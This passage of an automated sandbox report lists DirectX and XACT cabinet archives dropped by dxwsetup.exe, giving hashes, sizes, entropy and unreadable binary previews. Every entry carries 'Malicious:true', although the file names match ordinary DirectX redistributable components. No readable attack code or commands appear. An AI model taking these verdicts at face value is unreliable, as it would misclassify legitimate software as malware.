                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2007_d3dx9_35_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2008_d3dx9_39_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2009_d3dx11_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2005_d3dx9_28_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1352016 bytes, 5 files, at 0x44 +A "d3dx9_28_x64.cat" +A "d3dx9_28.dll", flags 0x4, ID 6650, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1361184
                                                                                              Entropy (8bit):7.9996739284035945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWKJ8/HOO46naMPT4WtPIDONJkwzpow5Xl6tgvmKSGfEov6tTc1RImGLtqrtYEm:Mj+146nP3PIabkUl6tg+KSG8o2TcRG8E
                                                                                              MD5:D964ED45FF274DA2C8F48E2CBD00AA9F
                                                                                              SHA1:5C2E5607065238FB24A0B65DDFC904406615E2A9
                                                                                              SHA-256:DAF10A54089755F9A8ACEFF0C7695F1AA42D35E3179DA5B9BB91E409036AE547
                                                                                              SHA-512:A74E2DD4BFB037E5F5A1DEAA86F9C4A354F023B62E1F2075509FB707EEE1725B1136441D1059BD3929AF1A44F6372DABEF9CD15D386A77B2B22A532B74CF16AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....P.......D...........................P....#..............w..............3g. .d3dx9_28_x64.cat..6:........35. .d3dx9_28.dll......U:....3. .infinst.exe......\;....39. .d3dx9_28_x64.inf.&...2_;....39. .dec2005_d3dx9_28_x64.inf...;..9..[.... &.m......R.P...?..R...A...8..(...J....H".VB....2.R.H..M.R.)U*.Rm .3.E#.....`.;..>.c..}.H...Nv .%@.mg..c....o:Ll...9...s...H..i\.e.t!..`....R.?.......@......F..o.......H0....vd.I1.x@.b..`.go.\..C...... .E.x l..xY.eHeE.."....o..J.....=...T..`....0o.(..%.Y&v...S...&.....h...HZ.2J.S^f1Xn.+.....WR....$B...H.......G...?y%.$....%?.A.%a...G]..F.sA./.-.R.7.f]@ ....t...D...9.....././....M/..A.yJ..\Io~I...G.......<Gt...7.!.g.".....t.r.w...f....N.6"4.>..A!.M.]u.~.G.^S..\/a../Y.=..u.U....d.i~.K7..<...e.b..G...~].....=isb?.fa6.._..p...X....P6<.k..[...l.`.........~/....D[c...'.]B..zE5...s..N].x..J.....h.&.,. p..an..I..w...y.....z".>.3_0.9. .....Z.U..3.=.......J.yHE.IU./!....._......O..`..%.0.X..5.jd.../bf..=(.**.....n.....Q.*..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2006_d3dx10_00_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2006_xact_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186515 bytes, 6 files, at 0x44 +A "xact2_5_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8443, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):144891
                                                                                              Entropy (8bit):7.997618513042835
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZCISkfUHof5yPnSKfEGMKBQ0sncpIt1EXRN0F+jTx8bh44VhRjR+t2h5fjJfn2EL:ZNdUIRanSK8Gd0nKIAN0F+RWugXRa2bz
                                                                                              MD5:219ABD58672661EA814E3739729DDC04
                                                                                              SHA1:3CFB7D0AE07A9FDA3D77AC761BAC4243ACA961F0
                                                                                              SHA-256:56AEAE85E4E85FCD50D2733371C4977602B720EE72522FE24ED93605BE037C69
                                                                                              SHA-512:8B0EE032677EA0CEC388C017A3AF5FD404F2F26191203D372EF8E95B19F16E669473039C70287B58759422D6DCACD3A1D45A6F13D85952CF5DFD56EC63EADF02
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................ ...............#..................! .........5.a .xact2_5_x64.cat..E..! ....o5.\ .x3daudio1_1.dll.....9e.....5.` .xactengine2_5.dll.....QZ.....5T_ .infinst.exe.....ia.....5.` .dec2006_xact_x64.inf......d.....5.` .xact2_5_x64.inf....V.:..[.........A.P$..O.v..lM.!I.S.T..FJ%;..R.U..pj&...L..:.B. .W.I.... .3.43.`...W...kK..p......-].5....)R...V..vW...mu...]].M...al..5%:..vi,C .JH..81&..$..O!(..........D#`F.5......$.!..# F...4F.....4..E......Yx...>...6.b8..a..Bh.......`..`G2.9..0%.0y!..P8.M..L...j.-?d+...2.m..S..P2,`.cg...M.....M..^.....!.U..I.(..P.....<..p..@.......]..G..A&B.HD..(\.GM.......A..^!.B.W.U.L..r....A.".....t.0`@Zw.Fa...s....C.......Q...,.N...W.C.P........|...R.^@.....2..(..3.....N....z...wd\..O,...........~...J"GQO|...4... %.I.BU..>E+Y&r.HdA[.c..,.h.../F..k...>...$d....ko."T@os...N&..'.z...FJ.y..;. ......y...]..i`.@..O.........gk...NW.B...5-.....C........']~|..HR]....'.....|.n..).2..'.dT.G.....p......k.8!^...;.e

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Feb2005_d3dx9_24_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1241539 bytes, 4 files, at 0x44 +A "d3dx9_24_x64.cat" +A "d3dx9_24.dll", flags 0x4, ID 4731, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1250707
                                                                                              Entropy (8bit):7.999567218170613
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:bsacaEhnsKcwXWOBfH7OhvlY2HIbbK09zRy2/TnN75EEvIOiOhpbF:xuzcwXW6YlFIbtN7MOiOh
                                                                                              MD5:DCA673A8F9F834F9370862D1C97FD9E7
                                                                                              SHA1:1A0CF0FDDA2C9E8ABDF5CC19FCDBEAF1BC1639E7
                                                                                              SHA-256:BE3DE63F136A2B41D3229E477CE2CD7F67DED031B4B370E640C39B80368238CF
                                                                                              SHA-512:255270BDBC1DCD6A3213D8F0DA2E48C6445B0141C5148EDD1DABC9CA4643667651694B68013412A4F2EC90CCD60A757F64A9A76E2576C4FCB056DDE726A6F67B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............{................#..............o...7.........E2.. .d3dx9_24_x64.cat...6.7.....E2.. .d3dx9_24.dll......26...E2h. .infinst.exe.......7...92.. .d3dx9_24_x64.inf. ..nl9..[.... Wnq..@..$Q.P...>.$..B;.*.......R...te.....K+.E...E%.....Zk...AQ.....8....C........h...:'iI....5B.'.:}..Y{-.H.6.*.......b...$.P........'..*..i.....H..i"8..$..........!"..."I.n6.Me6...Z..F)..P.^P..P.W.~........&V...q..~..'.AE.!...."...(.$.eP.HD..5................k..Ky%.>.kS....l.)...uN.-.$S.."......I@...bh./V.).A.....+.].....'.]....q.>.Uo...."..g...U.(...qXq.pH.L... ...."V.....Q.R....'>\...9.s............8....]gON..`a..S..u.O%.e.....U...H..CCr`.n...7=}...|z..3...k......CH.^.#..../.....c.rM_.`............"...y#.....YW...<..%CZ...=.c....ni......8.^....G.V.J8..". .?@.+R..'...m.7...JX...q....p.......:....zs..@.....9..w.Q......3+.......wt...G.\..V..8......B.=+.,#..l.Z..R.....F.=8.....#p..'......>.q.h...E.ME.^ig......./......".GB.O..Q...i.-r. .......

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Feb2006_d3dx9_29_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\JUN2006_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 174825 bytes, 6 files, at 0x44 +A "xact2_2_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):183993
                                                                                              Entropy (8bit):7.996017590596314
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:fC8YuRPaoTUX/SmAwGUGY+geIhVhbjF/kZ8FyQU02JhzqhA7J4rMgThmwQvzb7e:fCoJaoT8/2Z9YA+VhbR8Zwy3RimwQvzm
                                                                                              MD5:D404CCED69740A65A3051766A37D0885
                                                                                              SHA1:288818F41DA8AB694C846961294EE03D52AEA90D
                                                                                              SHA-256:5163AFA067FE2F076AB428DD368BA0A2CF6470457BA528A35E97BE40737A03C0
                                                                                              SHA-512:87998E67B359C2A0D4F05DC102F6C4DB4F260903385B7558A2C1A71436001D5B18F42B984E6B279A8197243593C385D41F51DE630FA31C5CA5140F6970F87657
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................!..............#..................! .........4=< .xact2_2_x64.cat..@..! ....C4)E .x3daudio1_0.dll..g...`.....4.: .xactengine2_2.dll............4.: .infinst.exe.....!......4.; .jun2006_xact_x64.inf............4.; .xact2_2_x64.inf....&9..[.........R.P...?.p.v.K.......AA..;.vDB.*....xUt....=!)"yP..."C. h..F#.....P.l}.epD.....;....7..P...{s7......$.S..q.ce..g8V....&..F~............A.=.....HP@.cB<..FPT....^.......G.....;P.PBz...D...Y.$@..J....5W...%v..p ..D...7.f$)..HyIO.--z.{5.H.;.@Z.n...T)H..G...|....T.. ..!.u0.^..*...0$`...L8.]..h=..@...L....|...4=.z......l.H....h-..l..2P.].$.....v.7...]......K..=`..?......g.....................D*".0....X...0....m.....;..8.1..bCF..J....Mq......V..@...... ..bz..ox...7t...X.~...@...n...........+.V...{..x..(y../o....Q.TC.=..... h...S<J.1...Or...|O.........}.!..h(`.W...t.l....w.m.....1d......~?#..#.K../...."..y_...z$}..s..q.W.....6[.......*x.~H..(>%.R=.....7...=G...Q.........X./.......Ot.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Jun2007_d3dx10_34_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 693084 bytes, 7 files, at 0x44 +A "d3dx10_34_x64.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 10180, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):702252
                                                                                              Entropy (8bit):7.999542751209748
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:8B7y3n2GQi70ZEqAEToKVkDYK96luRC/Qwrkxb0b9fhXNkVkN2t3r1:8BO/j0ZWET/isK96luRC/jk49JN2t71
                                                                                              MD5:1AB35D11274D1ADBD316B19C44B9AE41
                                                                                              SHA1:14165EC367CE179588C8A5806FC968FDB49B4ACA
                                                                                              SHA-256:02ED1B5A850EDB52EC174DE177E91842EDC7C5F4C06CEDA5B16F3427DBCD4C99
                                                                                              SHA-512:71C8FAC7C95211D323C4FB6A02916E7D43EE399BBE0F1D983B5AC210F5039B23355F40B36F023F3C36E19787E2871A60CC389E51D6327652CD84D9E3B93D5A4D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....\.......D................'..........\....#..........4...=....).........6.. .d3dx10_34_x64.cat.pa...).....6.. .d3dcompiler_34.dll.h...2......6.. .d3dx10_34.dll.h....F.....6.. .infinst.exe......X.....6.. .d3dx10_34_x64.inf......Z.....6.. .d3dx10_34_x64_xp.inf./....\.....6.. .jun2007_d3dx10_34_x64.inf.........[.....p...R.P...>..s+..A.%..".J8.Z....B.Z......VR.!B.T%AP..H...1....0..~_.Z./_y.l.u....`..[r-..d.wj....B^.QrAc..-../?.....".......A....P4DP{....|.d.t..4.}.W58Ah)...TNRt......2$.....r..q .^...1....... .. 3..*.......|.J..=....N.KB|.{.J...W..1O....Z4...@H...T..p....0}.A...q..-B...I.($.J.K~..G.$..y....8.`$w@|..FO.Km.....#/.P4..3 P..by...e......O....(...]..P>(o..?...#t....P....?b/..(.............g.F*....|T.XPw.P..I.4..x..&PZ.C|8o......8I/..p.....K.(.'a...t.....A~.<.7.9.'...'.....O.p<EO......F.E........e...A{.@=.e...:..y.J......F.z...].......G..{...~z@...S$....'....p}..'......(#..(.......;.~.....hyXVfA............'h....nj.R.p,h........W......G.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Jun2010_d3dx10_43_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191323 bytes, 5 files, at 0x44 "d3dx10_43.dll" "d3dx10_43_x86.cat", flags 0x4, ID 7293, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200491
                                                                                              Entropy (8bit):7.9966634458730566
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kD2Fju8h1xkWCD/5e8U2LK1aQAMxVz2aoOxoY4+ApyP0EwMGvFas+8QJgdBvCD7D:kwbCleyYagxVCaoV+ApcnG9aKQJaw/
                                                                                              MD5:591A61BD06C73C70F93DAC5AF2D8E924
                                                                                              SHA1:C9D36AC5E2ACAC31A7413D22ED1C09C71CC96FFB
                                                                                              SHA-256:F0BC06CEB484D97CF01526F9223DF7B4357D166C4391869F2E7D514DC1FE769B
                                                                                              SHA-512:3E2E3318A700A6ED82A21018403CA99728C8A56B7DF81F99A5D705B586CEE1141586DBF19A01EF1F1A72DDC8F45DDB51BA5769AE4634B02233EF1AC4E0FBA5D4
                                                                                              Malicious:true
                                                                                              Preview:MSCF....[.......D...............}...........[....#..................`/.........<!]..d3dx10_43.dll.....`/.....<B'..d3dx10_43_x86.cat......I.....<.&..d3dx10_43_x86.inf.(....L.....<.&..d3dx10_43_x86_xp.inf.c....O.....<.&..JUN2010_d3dx10_43_x86.inf..=.h`1..CK..T.I....8*....ePQP....SENJ..1 q....a@EE.a]E.5....F.t...s.v.iM._W7+..:..........oW.*NMM....e...1.*+.f.#..2.....7.S..V..|..O.yX.2]..Q'jbReq1*.Z+.U.4.*.R%........6....<./...gU.g.)...u.y....dj.....UJ'j....[/.../E....e\.._...^..Gb..}.*...37..2L..a..q...../.|...z.#e$.ZU7...vnkmh?W....-..L^...h.0.....>.Y._....f.......vpO#.1..6_U.o.......h.#.`.d....j.F.0.6.1..>.H...`'J..A.%6.tM.\.:<.......F...!.K......?t.:...../...2..=...2....&e^...I.M`........H."........@&0.X...%.1..p.h3L(..V....K...5....X........x.]..@}.F.8.......%.T`.....=...!...x`40...v.g...k..6...@. .......wh.@ .......F..+..#`.....p_-e*.3...^`+....&..@.......o....:.... ....c.&p.8.....6.K..@......e~....H.w..R..........`.0.X....G..`)k.8...-0.....n.....R......f..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Mar2008_d3dx9_37_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
